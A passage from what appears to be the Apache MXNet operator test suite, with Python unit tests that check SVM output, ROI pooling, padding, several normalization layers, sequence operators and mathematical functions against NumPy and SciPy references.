unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad)
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
def test_layer_norm():
for enforce_safe_acc in ["1", "0"]:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for dtype, forward_check_eps, backward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4],
[1E-2, 1E-3, 1E-4]):
if dtype != np.float16:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]
else:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10)], [True, True] # large input + fp16 does not pass the forward check
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
